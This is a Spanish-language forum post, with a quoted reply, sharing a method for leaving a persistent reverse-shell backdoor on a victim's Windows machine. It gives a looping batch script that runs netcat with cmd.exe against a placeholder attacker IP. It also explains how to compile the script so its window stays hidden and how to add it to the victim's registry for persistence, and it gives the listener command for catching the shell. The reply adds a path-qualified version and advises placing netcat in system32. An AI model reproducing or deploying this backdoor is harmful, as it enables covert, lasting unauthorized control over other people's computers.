Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:
Código:
@echo off
:svr
nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.















Citar
bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error

Esto es un backdoor, supuestamente hemos obtenido el control del sistema (o no...) y queremos dejar una puerta trasera. Nc lo mejor es meterlo en system32 si no:

Código:

@echo off
:svr
c:\ruta\nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr